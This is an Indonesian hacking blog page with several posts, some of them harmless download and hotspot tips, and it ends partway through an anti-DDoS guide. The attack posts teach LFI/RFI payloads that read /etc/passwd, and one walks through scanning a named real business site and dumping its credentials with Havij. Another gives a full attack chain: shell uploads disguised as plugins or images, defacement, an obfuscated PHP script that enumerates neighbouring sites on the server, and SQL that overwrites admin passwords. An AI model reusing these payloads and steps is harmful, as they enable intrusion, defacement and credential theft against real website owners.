Tutor singkat RFI & LFI

Buat yg belum tau aja yhaa... klo yg udh jago, mending ga ush di baca... drpd buang2 waktu<br /> Sebelumnya apa sih LFI dan RFI itu??<br /> <br /> LFI (Local File Inclusion) adalah sebuah lubang pada site di mana attacker bisa mengakses semua file di dalam server dengan hanya melalui URL.<br /> RFI (Remote File Inclusion) adalah sebuah lubang dimana site mengizinkan attacker meng-include-kan file dari luar server.<br /> <br /> Penjelasan<br /> fungsi-fungsi yang dapat menyebabkan LFI/RFI:<br /> <blockquote class="tr_bq"><div class="codeblock"> <div class="title"><u>Code:</u><br /> </div><div class="body" dir="ltr"><code>include();<br /> include_once();<br /> require();<br /> require_once();</code></div></div></blockquote>Dengan syarat pada konfigurasi php di server:<br /> allow_url_include = on<br /> allow_url_fopen = on<br /> magic_quotes_gpc = off<br /> <br /> contoh:<br /> misalkan kita punya file index.php dengan content kodenya seperti ini, <br /> <blockquote class="tr_bq"><div class="codeblock"> <div class="title"><u>Code:</u><br /> </div><div class="body" dir="ltr"><code><?php<br />   include "../$_GET[imagefile]";<br />   ?></code></div></div></blockquote>misal $imagefile=image.php<br /> mungkin di url akan terlihat seperti ini bentuknya<br /> <blockquote class="tr_bq"><div class="codeblock"> <div class="title"><u>Code:</u><br /> </div><div class="body" dir="ltr"><code>http://www.[target].com/index.php?imagefile=image.php</code></div></div></blockquote>maka script ini akan menampilkan halaman image.php.<br /> <br /> nah disini attacker akan dapat melakukan LFI karena variable imagefile di include begitu saja tanpa menggunakan filter.<br /> misalnya attacker ingin mengakses file passwd yang ada pada server, maka dia akan mencoba memasukan seperti ini ../../../../../../../../../etc/passwd << dengan jumlah "../" itu tergantung dari kedalaman folder tempat file index.php tersebut.. dengan begitu isi file passwd akan ditampilkan di browser. kita bisa menggunakan metode menebak struktur folder dalam website target :lol:<br /> <br /> tapi seandainya terdapat error seperti di bawah ini:<br /> <br /> Warning: main(../../../../../../../../../etc/passwd.php) [function.main]: failed to open stream: No such file or directory in /their/web/root/index.php on line 2<br /> liat pada passwd ternyata dia ditambah dengan extensi ".php" berarti code yang digunakan untuk include adalah seperti ini <br /> <blockquote class="tr_bq"><div class="codeblock"> <div class="body" dir="ltr"><u>Code:</u><code><br /> code:<br />   <?php<br />   include($_GET[imagefile].".php");<br />   ?></code></div></div></blockquote>nah untuk dapat mengelabui script tersebut kita bisa menggunakan (dengan syarat magic_quotes_gpc = off) jadi dibelakang /etc/passwd kita tambahkan seperti<br /> <br /> http://www.[target].com/index.php?imagefile=../../../../../../../../../etc/passwd<br /> <br /> lalu untuk apa ? yaitu untuk menghilangkan karakter apapun setelah passwd.<br /> * ini disebut null injection.<br /> <br /> Nah kita sudah menemukan bug LFI pada website target, sekarang kita coba cari bug RFI dengan menambahkan link file remote (dari luar website) pada variable imagefile. misalnya:<br /> <br /> http://www.[target].com/index.php?imagefile=http://www.[remote].com/evil.txt<br /> <br /> dengan file evil.txt misal berisi "hacked by n4is3n"<br /> <br /> jika ternyata di browser menampilkan kalimat tersebut berarti website tersebut vulner terhadap bug RFI juga.<br /> <br /> <br /> Pencegahan<br /> Nah sekarang saatnya untuk pencegahan kedua bug tersebut, yaitu<br /> 1. Memvalidasi variable.<br /> 2. Mengkonfigurasi kembali settingan php pada server website Anda.<br /> allow_url_include = off<br /> allow_url_fopen = off<br /> magic_quotes_gpc = on<br /> 3. pada include mungkin bisa ditambahkan "./"<br /> jadinya seperti ini, <br /> <blockquote class="tr_bq"><div class="codeblock"> <div class="title">Code:<br /> </div><div class="body" dir="ltr"><code>Code:<br /> include("./"$_GET[imagefile].".php");</code></div></div></blockquote>maksudnya dengan seperti itu, saat kita mengakses file dari luar server maka hasilnya akan error karena saat pemrosesan setiap file yang masuk ke variable page akan ditambah ./ di depannya.<br /> <br /> http://www.[target].com/index.php?imagefile=http://www.[remote].com/evil.txt<br /> <br /> dengan seperti ini server atau website yang diinject akan mencari file http://www.[remote].com/evil.txt dan pastinya akan menyebabkan server menampilkan error bahwa tidak ditemukannya file tsb.<br /> <br /> Semoga tutor sederhana dan sangat awam ini (Maklum, yg nulis jg msh awam) bermanfaat. <img alt="Smile" border="0" src="http://hacker-newbie.org/images/kucink/smile.gif" style="vertical-align: middle;" title="Smile" /><br /> <br /> *Referensi:<br /> - Crawler<br /> - <a href="http://en.wikipedia.org/local_file_incusion" target="_blank">http://en.wikipedia.org/local_file_incusion</a><br /> - <a href="http://en.wikipedia.org/remote_file_inclusion" target="_blank">http://en.wikipedia.org/remote_file_inclusion</a><br />  

Tutor singkat RFI & LFI

Buat yg belum tau aja yhaa... klo yg udh jago, mending ga ush di baca... drpd buang2 waktu Sebelumnya apa sih LFI dan RFI itu?? LFI (Loca...

Read more »

Search bugs via webcruiser

download dulu toolsnya kk ., <a href="http://sec4app.com/" target="_blank">webcriuser </a><br /> dalam contoh ini ane ambil contoh : <a href="http://radiantbusiness.co.za/" target="_blank">http://radiantbusiness.co.za/</a><br /> cara kerja :<br /> <br /> 1. buka dulu toolsnya .,<br /> 2. silahkan kk masukan target pada bagian url .. dan klik scan site .,<br /> <ol></ol><div style="margin: 5px 20px 20px;"><div class="smallfont" style="margin-bottom: 2px;"><b>Spoiler</b>: <input onclick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = ''; this.innerText = ''; this.value = 'Tutup'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Buka'; }" style="font-size: 12px; margin: 0px; padding: 0px; width: 55px;" type="button" value="Buka" /></div><div class="alt2" style="border: 1px inset; margin: 0px; padding: 6px;"><div style="display: none;"><div class="separator" style="clear: both; text-align: center;"><a href="http://a7.sphotos.ak.fbcdn.net/hphotos-ak-ash4/432329_264363583642864_100002076733212_610012_1016650492_n.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="235" src="http://a7.sphotos.ak.fbcdn.net/hphotos-ak-ash4/432329_264363583642864_100002076733212_610012_1016650492_n.jpg" width="320" /></a></div><br /> </div></div></div>3. nantinya akan muncul kelemahan2 web yang kk udah scan tadi <br /> <div style="margin: 5px 20px 20px;"><div class="smallfont" style="margin-bottom: 2px;"><b>Spoiler</b>: <input onclick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = ''; this.innerText = ''; this.value = 'Tutup'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Buka'; }" style="font-size: 12px; margin: 0px; padding: 0px; width: 55px;" type="button" value="Buka" /></div><div class="alt2" style="border: 1px inset; margin: 0px; padding: 6px;"><div style="display: none;"><div class="separator" style="clear: both; text-align: center;"><a href="http://a1.sphotos.ak.fbcdn.net/hphotos-ak-snc7/432329_264363586976197_100002076733212_610013_2060291815_n.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="235" src="http://a1.sphotos.ak.fbcdn.net/hphotos-ak-snc7/432329_264363586976197_100002076733212_610013_2060291815_n.jpg" width="320" /></a></div><br /> </div></div></div>4. langkah lanjut ., kk bisa pake havij apa manual aja .. terserah deh ., tapi disini ane makenya havij ..<br /> 5. masukan bug web target yang kita dapat tadi ! dan crootz username + passwordna ketemu ..!., <br /> <div style="margin: 5px 20px 20px;"><div class="smallfont" style="margin-bottom: 2px;"><b>Spoiler</b>: <input onclick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = ''; this.innerText = ''; this.value = 'Tutup'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Buka'; }" style="font-size: 12px; margin: 0px; padding: 0px; width: 55px;" type="button" value="Buka" /></div><div class="alt2" style="border: 1px inset; margin: 0px; padding: 6px;"><div style="display: none;"><div class="separator" style="clear: both; text-align: center;"><a href="http://a4.sphotos.ak.fbcdn.net/hphotos-ak-snc7/432329_264363590309530_100002076733212_610014_2050749191_n.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="235" src="http://a4.sphotos.ak.fbcdn.net/hphotos-ak-snc7/432329_264363590309530_100002076733212_610014_2050749191_n.jpg" width="320" /></a></div><br /> </div></div></div>6. selanjutnya terserah dah mau dibuat apa tu web<br /> <div style="margin: 5px 20px 20px;"><div class="smallfont" style="margin-bottom: 2px;"><b>Spoiler</b>: <input onclick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = ''; this.innerText = ''; this.value = 'Tutup'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Buka'; }" style="font-size: 12px; margin: 0px; padding: 0px; width: 55px;" type="button" value="Buka" /></div><div class="alt2" style="border: 1px inset; margin: 0px; padding: 6px;"><div style="display: none;"><div class="separator" style="clear: both; text-align: center;"><a href="http://a6.sphotos.ak.fbcdn.net/hphotos-ak-snc7/432329_264363596976196_100002076733212_610015_1189499644_n.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="235" src="http://a6.sphotos.ak.fbcdn.net/hphotos-ak-snc7/432329_264363596976196_100002076733212_610015_1189499644_n.jpg" width="320" /></a></div><br /> </div></div></div><span style="color: yellow;">Sekian ^.^</span>

Search bugs via webcruiser

download dulu toolsnya kk ., webcriuser  dalam contoh ini ane ambil contoh : http://radiantbusiness.co.za/ cara kerja : 1. buka dulu too...

Read more »

Alur Web Attack

<span style="font-size: small;"><span style="color: red;"><span style="font-weight: bold;">Scan => XPL/SQLi => Upload Shell => Deface/Jumping => Rooting</span></span></span><br /> <br /> <span style="text-decoration: underline;"><span style="color: red;"><span style="font-weight: bold;">1. Scan</span></span></span><br /> <br /> Cari tau dimana letak kelemahan web target. Bisa di scan pake beberapa tool scanner. Diantar'a yang paling terkenal :<br /> <br /> <a href="http://www.acunetix.com/" target="_blank"><span style="color: mediumblue;"># Acunetix (Windows)</span></a><br /> <span style="color: mediumblue;"><a href="http://www.cirt.net/nikto2" target="_blank"># Nikto (Linux)</a></span><br /> <br /> Selain dapat mendapatkan bug kita juga dengan tool itu akan dapat mengumpulkan informasi berguna dari web target.<br /> <br /> <span style="color: red;"><span style="text-decoration: underline;"><span style="font-weight: bold;">2. XPL/SQLi</span></span></span><br /> <br /> Setelah kita dapat menemukan data dari web target. Kita coba cari cara untuk meng-Exploitasi bug-bug yang sudah kita temukan dengan tool scanner tadi. Di bawah ini daftar situs yang menyediakan macam-macam Exploit :<br /> <br /> <a href="http://www.exploit-db.com/" target="_blank"><span style="color: darkgreen;"># Exploit Database</span></a><br /> <a href="http://packetstormsecurity.org/" target="_blank"><span style="color: darkgreen;"># Packet Storm</span></a><br /> <a href="http://www.1337day.com/" target="_blank"><span style="color: darkgreen;"># Inj3ct0r</span></a><br /> <a href="http://www.hack0wn.com/exploits.php" target="_blank"><span style="color: darkgreen;"># Hack0wn</span></a><br /> <br /> Apabila target menggunakan CMS Joomla/Wordpress, kita dapat mencari Exploit untuk plugin-plugin yang di gunakan web target. Karena dengan tool scanner di atas kita diberikan informasi seakan-akan web target sudah di bedah keseluruhan'a. Jadi kita tahu isi folder dari web target, termasuk plugin-plugin apa saja yang digunakan.<br /> <br /> Kalau teknik SQLi dapat di lihat disini :<br /> <br /> <span style="color: black;"><span style="font-weight: bold;">Ebook beserta sourc website untuk praktek teknik SQLi donlot <a href="http://www.4shared.com/file/-uHDjYGC/SQL-Injection-Exposed-cruzenal.html" target="_blank"><span style="color: red;">disini</span></a></span></span><br /> <br /> <span style="color: red;"><span style="text-decoration: underline;"><span style="font-weight: bold;">3. Upload Shell<br /> </span></span></span><br /> Website sudah bisa di Exploitasi dan kita sudah bisa masuk ke halaman admin. Tinggal kita upload shell'a sekarang ;<br /> <br /> <span style="font-style: italic;"><span style="color: mediumblue;">- Upload shell di Wordpress bisa mengupload plugin or thema yang sudah disisipi file shell'a.<br /> - Upload shell di Joomla juga sama, cuma bisa juga menggunakan Plugin <a href="http://ari7al.blogspot.com/2010/08/upload-backdoor-di-joomla.html" target="_blank">Ninja Explorer</a><br /> - Upload Shell di CMS biasa bisa melalui menu upload gambar, kalau tidak bisa coba shell'a di rename menjadi shell.php.jpg lalu upload.</span></span><br /> <br /> Setelah shell berhasil di upload tinggal panggil letak URL shell'a dimana.<br /> <br /> <span style="color: red;"><span style="text-decoration: underline;"><span style="font-weight: bold;">4. Deface or Jumping</span></span></span><br /> <br /> Kalau pengen gaya-gaya an (Deface), cari file index.php lalu rubah file di dalam'a dengan script Deface yang kita punya. Bagi yang malas bikin scrip deface dapat menggunakan tool ; <a href="http://ari7al.blogspot.com/2010/12/buat-yang-lagi-males-bikin-page-buat.html" target="_blank">DefaceMaker</a>. Coba arshive kan website yang sudah kita deface di situs :<br /> <br /> <span style="color: red;">- <a href="http://indonesiandefacer.org/" target="_blank">Indonesian Defacer</a><br /> - <a href="http://www.zone-h.org/" target="_blank">Zona-H</a></span><br /> <br /> Tidak cukup hanya bisa men-Deface satu web saja. Coba gunakan teknik jumping untuk masuk ke web yang satu server sama web yang telah kita deface. Cara'a ?<br /> <br /> Script jumping ;<br /> <blockquote class="tr_bq"><br /> <code><? <br /> <br /> $x15="\x61rray\137\x70\165\x73h"; $x16="f\x65\157\146"; $x17="fgets"; $x18="\146\x6f\160\145\156"; $x19="in\x69\137g\145\164"; $x1a="is\x5f\x72\145ad\141b\154e"; $x1b="\x73\x65t_t\151\155\x65\137li\155\x69t"; $x1c="\x73\x74\162\x70\157\163"; $x1d="\163\165b\x73t\x72"; <br /> ($x0b = $x19('safe_mode') == 0) ? $x0b = 'off': die('<b>Error: Safe Mode is On</b>');$x1b(0);@$x0c = $x18('/etc/passwd','r');if (!$x0c) { die('<b> Error : Can Not Read Config Of Server </b>'); }$x0d = array();$x0e = array();$x0f = array();$x10 = 0;echo "\074b>\x3cfo\x6e\x74\040fa\x63\x65=\126\x65\x72\x64an\141\x20s\151\x7a\x65\075\x33 c\157\154\157\x72\x3d\x54\x65\141\x6c>\x20\123\x65\x72\166\145\x72 \x4a\x75\155\160in\x67\x20\x46\x69\x6ed\145\162 \126er\x73ion\x201.\x30\x20<\057f\157\x6et\x3e<\x2f\x62\x3e<\142\x72\040\x2f\x3e";echo "<font \146\x61\x63\145\075V\145rd\x61\x6ea s\x69\172\x65=\x32 \x63\x6fl\x6f\162\075Ma\162\x6fo\x6e\x3eC\x72\x65at\145d \x42\x79\040\x58\141\144\160\x72ito\170 \x2c \0620\061\x30,\040\124\141\156\x67\145r\x61\x6e\147 <\057\x66\157\156\x74\076\074b\x72\040\x2f>";echo "\074\142\162\x20\057\076";echo "<\142>\x3c\146o\156t\x20\146\141\x63\145=V\145\x72\144\141\x6ea \x73\x69z\x65=\062\076\104ed\x69\143\141\164\x65\144\x20\124o\x20H\141c\x6b\145\ ​ 162-\103\151\x73\141\x64\141\x6e\x65\x2e\x4fr\147\x20<\x2f\146\157n\164\076\074\x2f\142><\x62\x72 \x2f>";echo "\x3c\x66o\x6e\164\040f\141\143e\x3d\126\x65\162\x64\141n\x61\040\163\151z\x65\x3 ​ d\x32\040\x63\157l\157\162\075\x4d\x61ro\157\156>\040\124ha\156ks\x20To\x20#\x20\104\145v\151\x6c\172c\060\x64\x65 \043\040\110\141c\x6be\x72\040\116e\167\x62\x69\145\x20\x23 \130\103\x6f\x64\145 \043 \112a\163a\153om \x23\x20\105\143h\x6f\040\043\040\x59\103L\x20#\x20\x49\x6e\144\x6fn\145sia\x6e\ ​x20\103\x79b\x65r \x23\040\x61\x6ed\040\x61l\x6c\x20Hack\x65\x72\040F\157\162\x75\155\040\111\x ​6e In\144o\x6ee\x73\x69\141 <\057\x66\x6f\x6e\x74\x3e<\x62r /\x3e";echo "\x3c\x62r /\x3e";echo "<f\x6fnt\x20\146\x61\143\x65\x3d\126\x65\162\144a\156a \163iz\145=2\x20c\x6f\154\157\162\075\x4d\x61ro\157n\076 \x4f\x6b\054\x20L\x65\x74'\x73 B\x65g\x69n \x2e\x2e\056\x20\x3c/\x66\x6f\x6et><b\x72\x20\x2f\076";echo "\x3c\x66\x6fnt\x20f\141\143\145=\126er\144a\x6ea\x20\x73i\x7ae=\062 c\x6f\x6c\x6fr=\x54\x65al>\x2a\052\052*\052\x2a\x2a**\052\052\052\x2a***\x2a*\x2a\052\x2a\x2a**\052\x2a ​ *\x2a\052\052\052\052**\052***\x2a*\x2a*\x2a\052*<\x2f\146\157\156t\076\x3c\142r\x20/>";while(!$x16($x0c)){$x11 = $x17($x0c);if ($x10 > 35){$x12 = $x1c($x11,':');$x13 = $x1d($x11,0,$x12);$x14 = '/home/'.$x13.'/public_html/';if (($x13 != '')){if ($x1a($x14)){$x15($x0e,$x13);$x15($x0d,$x14);echo "\x3c\x66on\164\x20f\141\x63\x65\x3dVe\162da\156\141\x20\163\x69ze\0752\040co\154 ​\x6f\x72=\x52\145\x64\x3e[F\x6f\x75\156d\x20\041\135 $x14\074/\x66\157n\x74\x3e";echo "<\142\x72/\x3e";}}}$x10++;}echo "\074\x66on\x74 \146\141ce\075\x56e\x72\x64\141\x6e\141\040\x73\151z\x65\075\062 \x63\x6flo\162\x3d\124\145\x61\154\076\x2a\x2a\x2a\052\x2a*\052\052*\x2a\052*\x2 ​ a*\052\x2a*\052**\052*\x2a**\052\x2a\x2a**\052*\052\x2a\052\x2a\052**\052**\x2a\ ​x2a\052</font\076<b\x72\x20\057\x3e";echo "\x3cb\162 /\076";echo "<\146\157\x6et\x20\x66\x61\x63\x65\x3dV\x65\162\x64a\x6e\x61 \163\151\x7a\145=\062\040c\157l\157\x72=M\141\x72\157\x6f\156\076\x54\x68an\x6bs ​ \106\x6fr \125\x73\x69n\x67 \x54\150\x69s S\151m\160\x6c\x65\x20\124\x6f\x6f\x6c\x73.\040 \x5e_\x5e\074\057\146\157\x6et\x3e\074b\162 \x2f\076";echo "\074f\157\156t\x20\x66\141ce=V\x65rd\x61\156a\040\163\x69\172\145\x3d\062\076 ​<\057\x66ont\x3e";echo "<f\157n\164\040f\x61\143\145\x3d\126e\162dana\040\163iz\145=\x32\x3e\074/\146\157\156t>";<br /> <br /> ?></code></blockquote><span style="color: red;">- Upload script jumping'a<br /> - Rename jadi jumpingfinder.php<br /> - Panggil letak URL file tersebut<br /> - Masuk ke public_html web target<br /> - Masuk ke MySQL'a (cari acount MySQL di file config)<br /> - Cari table user<br /> - Update Password user admin</span><br /> <br /> Dibawah ini ada script khusus untuk update user password admin :<span style="color: red;"> </span><br /> <span style="color: red;"># Wordpress </span><br /> <blockquote class="tr_bq"><div class="title">PHP Code:</div><code><span style="color: #0000bb;">UPDATE </span><span style="color: #007700;">`</span><span style="color: #dd0000;">note_wrdp1</span><span style="color: #007700;">`.`</span><span style="color: #dd0000;">wp_users</span><span style="color: #007700;">` </span><span style="color: #0000bb;">SET </span><span style="color: #007700;">`</span><span style="color: #dd0000;">user_pass</span><span style="color: #007700;">` = </span><span style="color: #dd0000;">'$P$BdEAI5H.T0REbjjKME506zOW03nggb0' </span><span style="color: #0000bb;">WHERE </span><span style="color: #007700;">`</span><span style="color: #dd0000;">wp_users</span><span style="color: #007700;">`.`</span><span style="color: #dd0000;">ID</span><span style="color: #007700;">` = </span><span style="color: #0000bb;">1 LIMIT 1</span><span style="color: #007700;">;</span></code></blockquote>User : admin<br /> Pass : admin<br /> <br /> <span style="color: red;"># Joomla</span><br /> <blockquote class="tr_bq"><div class="title">PHP Code:</div><code><span style="color: #0000bb;">update </span><span style="color: #007700;">`</span><span style="color: #dd0000;">jos_users</span><span style="color: #007700;">` </span><span style="color: #0000bb;">set </span><span style="color: #007700;">`</span><span style="color: #dd0000;">password</span><span style="color: #007700;">`=</span><span style="color: #dd0000;">"ece4f1e9e99fe6ca77c100d02cf4aa60" </span><span style="color: #0000bb;">where </span><span style="color: #007700;">`</span><span style="color: #dd0000;">username</span><span style="color: #007700;">`=</span><span style="color: #dd0000;">"admin"</span><span style="color: #007700;">; </span></code></blockquote>User : admin<br /> Pass : devilzc0de<br /> <br /> Password admin sudah berhasil di update tinggal ikuti seperti langkah nomor 3.<br /> <br /> <span style="color: red;"><span style="text-decoration: underline;"><span style="font-weight: bold;">5. <a href="http://www.blogger.com/goog_680808912">Rooting</a></span></span></span><a href="http://www.m0dr0ok.co.cc/2012/03/root-server-menambahkan-user-root-baru.html" target="_blank"> </a><br /> <br /> <br /> <span style="color: red;"><i>Sekian XD</i></span>

Alur Web Attack

Scan => XPL/SQLi => Upload Shell => Deface/Jumping => Rooting 1. Scan Cari tau dimana letak kelemahan web target. Bisa di s...

Read more »

Tools web hacking paling hot 2012

WebSploit T00lKit -- Realese 1.5 * 03-29-2012 <br /> WebSploit Is An Open Source Project For Scan And Analysis Remote System From Vulnerability<br /> Description :<br /> <blockquote class="tr_bq">[+]Autopwn - Used From Metasploit For Scan and Exploit Target Service<br /> [+]wmap - Scan,Crawler Target Used From Metasploit wmap plugin<br /> [+]format infector - inject reverse & bind payload into file format<br /> [+]phpmyadmin - Search Target phpmyadmin login page<br /> [+]lfi - Scan,Bypass local file inclusion Vulnerability & can be bypass some WAF<br /> [+]apache users - search server username directory (if use from apache webserver)<br /> [+]Dir Bruter - brute target directory with wordlist<br /> [+]admin finder - search admin & login page of target<br /> [+]MLITM Attack - Man Left In The Middle, XSS Phishing Attacks<br /> [+]MITM - Man In The Middle Attack<br /> [+]Java Applet Attack - Java Signed Applet Attack<br /> [+]MFOD Attack Vector - Middle Finger Of Doom Attack Vector<br /> [+]USB Infection Attack - Create Executable Backdoor For Infect USB For Windows</blockquote>About Author :<br /> Founder : 0x0ptim0us (Fardin Allahverdinajhand)<br /> Location : Azarbaycan <br /> <br /> Page : <a href="http://sourceforge.net/p/websploit/wiki/Home/" target="_blank">http://sourceforge.net/p/websploit/wiki/Home/</a><br /> Download : <a href="http://sourceforge.net/projects/websploit/files/" target="_blank">http://sourceforge.net/projects/websploit/files/</a>

Tools web hacking paling hot 2012

WebSploit T00lKit -- Realese 1.5 * 03-29-2012 WebSploit Is An Open Source Project For Scan And Analysis Remote System From Vulnerability D...

Read more »

IDM Wuiiissshhh.. :D

permisi om,mbak...<br /> buat yg hobby download pake IDM ne ada tutorial cupu,biar downloadnya ajib..walau tempatnya kayak tempat ane yg rame..<br /> <div class="separator" style="clear: both; text-align: center;"><a href="http://img200.imageshack.us/img200/1117/gbr2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div><ol><li> sediakan IDM trus data yg mau didownload..</li> <li> waktu udah mulai download klik stop dulu..</li> <li> klik kanan pada file yg kita download trus pilih properties</li> <li>masukkan 3 tanda tanya "???" setelah ujung address file yg didownload </li> <li>Resuma kembali</li> </ol>Ane yakin kecepatan download pasti naek..wussssssssssshhhhhhhhhh<br /> bandingkan setelah make tanda tanya "???" dengan yg langsung download aja pasti beda banget<br /> maaf kalau ada kata ane yg salah trus SSnya surim maklum newbie om..

IDM Wuiiissshhh.. :D

permisi om,mbak... buat yg hobby download pake IDM ne ada tutorial cupu,biar downloadnya ajib..walau tempatnya kayak tempat ane yg rame.. ...

Read more »

Percepat Download Anda Dengan Squid Proxy Untuk Windows

Kita Sering dibingungkan dengan adanya "keleletan" dalam mendownload sesuatu. Disini saya mempunyai solusinya yaitu dengan menggunakan squid proxy. Dengan menggunkan squid proxy ini kita dapat mendownload file dengan lebih cepat dan juga menghemat bandwith kita.<br /> <br /> CARA INSTALL DAN SETTING SQUID PROXY<br /> 1. Pertama kita download file Squid Proxynya <a href="http://www.4shared.com/file/gsUIYew_/squid.html" target="_blank">Disini</a> <br /> 2. Lalu kita download lagi File <a href="http://www.4shared.com/file/3wjGmA1v/squid.html" target="_blank">Squid.conf </a><br /> 3. Kemudian Extract “Squid.rar” to “c:\squid”<br /> 4. Lalu Copy and paste the “squid.conf” to “c:\squid\etc\”<br /> 5. Kemudian Buka Command Prompt (CMD)<br /> 6. Masuk ke Folder C:\Squid\Sbin\<br /> 7. Ketik “squid -i” untuk menginstall SQUID<br /> 8. Ketik “squid -z” utnuk membuat Creating Swap Directories<br /> 9. Kemudian Setelah itu kita Atur Squid Service agar selalu berjalan ketika start up :<br /> pergi control panel – Administrative Tools – Services<br /> 10. Kemudian Right click – properties. kita set pada tab StartUp Type menjadi Automatic. kalau tombol start belum di click, silahkan click setelah kita mensetting Startup typenya.<br /> 11. Kemudian klik OK. <br /> 12. Lalu Setting proxy di browser kita dengan ini "127.0.0.1:3128"<br /> <br /> Squid Ini juga bisa di padukan dengan IDM (Internet Download Manager) dengan cara merubah setingan proxy di IDM.

Percepat Download Anda Dengan Squid Proxy Untuk Windows

Kita Sering dibingungkan dengan adanya "keleletan" dalam mendownload sesuatu. Disini saya mempunyai solusinya yaitu dengan menggu...

Read more »

Tipz Aman Hotspotan Ditempat Umum

berdasarkan pengalman saya dan teman2 yang sedang hotspotan sering kali terjadi putus ditengah jalan hal ini membuat jengkel tentunya pas selidik demi selidk akhir ya saya tau bahwa ada seseorang yang dengan sengaja memutus jaringan hotspotan nya dengan bantuaan aplikasi netcut tentu saja hal ini sangat merugikan orang banyak dalam hati saya emang lu aja yang butu hotspotan internet....oleh karena itu saya menulis artikel semoga bisa bermanfaat bagi yang membacanya.<br /> <br /> Saat ini hot spot WiFi semakin banyak tersedia di berbagai tempat umum, tetapi setiap kali anda melakukan sambungan pada suatu hot spot sebenarnya anda membahayakan PC atau laptop anda sendiri. Hot spot adalah jaringan terbuka yang tidak menggunakan enkripsi sehingga ketika anda terhubung dengan pengguna hot spot lain, maka mereka dapat menyusup dan menimbulkan kerusakan pada komputer anda.<br /> <br /> Tetapi jangan sampai hal ini menyebabkan anda takut terhadap berbagai hot spot karena ada beberapa cara untuk mengamankan komputer anda ketika anda terhubung pada hot spot, yaitu:<br /> <br /> 1. Matikan ad-hoc mode WiFi : WiFi berfungsi dalam 2 mode yaitu infrastructure mode, yang anda gunakan ketika terhubung dengan suatu jaringan dan ad-hoc mode, ketika anda terhubung secara langsung pada komputer lain. Jika anda menyalakan ad-hoc mode maka ada kemungkinan seseorang di dekat anda menggunakan koneksi ad-hoc tanpa sepengetahuan anda dan mereka dapat masuk ke PC anda dengan bebas. Jadi jangan lupa untuk mematikan ad-hoc mode, caranya:<br /> <ol><li> Klik kanan pada ikon wireless di system tray</li> <li> Pilih Status</li> <li> Klik Properties</li> <li> Pilih tab Wireless Network</li> <li> Pilih sambungan jaringan anda saat ini</li> <li> Klik Properties, lalu klik tab Association</li> <li> Hilangkan tanda centang pada kotak “This is a computer-to-computer (ad-hoc) network”.</li> <li> Klik OK dan terus klik OK sampai semua kotak dialog menutup</li> </ol>2.apabila anda sering mengalami masalah seperti tidak conect padahal orang lain jelas-jelas koneksi nya tidak terganggu nah kemungkinan anda terkena netcut dari seseoarng jalan keluar nya anda harus mengaktifkan Anti netcut yang bisa di download garatis dsini instal pada laptop anda terus aktifkan .<br /> <br /> 3.paztikan kondisi batere laptop anda cukup paling gak sampe komputer masuk ke windows jika tidak passang catu daya kamu ke laptop agar aman<br /> <br /> 4.Matikan wireless adapter anda jika sedang offline : Jika anda sedang tidak terhubung ke internet pada sebuah area hot spot, lebih baik anda mematikan wireless adapter anda. Pada XP klik kanan pada ikon wirelesss dan pilih Disable.<br /> <br /> 5.Gunakan enkripsi email : Aktifkan enkripsi email pada saat anda sedang berada di area hot spot. Pada Outlook 2003 pilih Options dari menu Tools, klik tab Security dan berikan tanda centang pada kotak “Encrypt contents and attachments for outgoing messages.” Lalu klik OK.<br /> <br /> 6.Jangan pernah tinggalkan laptop anda : Tentu saja hal ini tidak hanya mengundang hacker saja tetapi juga pencuri.<br /> <br /> Sekian.. ^.^

Tipz Aman Hotspotan Ditempat Umum

berdasarkan pengalman saya dan teman2 yang sedang hotspotan sering kali terjadi putus ditengah jalan hal ini membuat jengkel tentunya pas ...

Read more »

Anti DDOS dengan DDOS-Deflate

ane cuma mau share tutor cupu yang ane dapet dari google barusan <br /> ini anti ddos versi google <br /> ok langsung saja cekidot<br /> <br /> Salah satu serangan mematikan dan menjadi suatu momok yang paling di benci oleh salah adminstrasi web jaringan adalah DDOS. ane gk jelasin mengenai apa itu DDOS .. cari tau sendiri aja ya. Nah mari kita coba2 belajar cara untuk menanggulanginya ..<br /> Pada saat server terasa berat ada kemungkinan anda terkena serangan DDOS. klo masih sempet kebuka sih masih bisa banned ip yang melakukan bad request ke server kita .. kita bisa cek dengan perintah :<br /> <blockquote class="tr_bq"><code>netstat -ntu | awk ‘{print $5}’ | cut -d: -f1 | sort | uniq -c | sort -n</code></blockquote>Nah klo gk sempet ?<br /> <br /> itulah maksud ane kita mesti melakukan apa yang di namakan dengan pencegahan ..<br /> ingat brother mencegah itu lebih baik dari pada mengobati .. hehehe<br /> lets learn ..<br /> ok sekarang login ke terminal pada server anda. Lewat SSH ato koneksi apa saja yang penting pada terminal ato console.<br /> Untuk sesi kali ini ane pengen berbagi tentang pemakaian DDOS-Deflate di mana tools ini akan membantu anda dalam pengamanan dari serangan DDOS.<br /> first .. ( download toolsnya via terminal)<br /> <blockquote class="tr_bq"><code>wget http://www.inetbase.com/scripts/ddos/install.sh</code></blockquote>nah setelah di download kita ubah chmod nya dulu agar 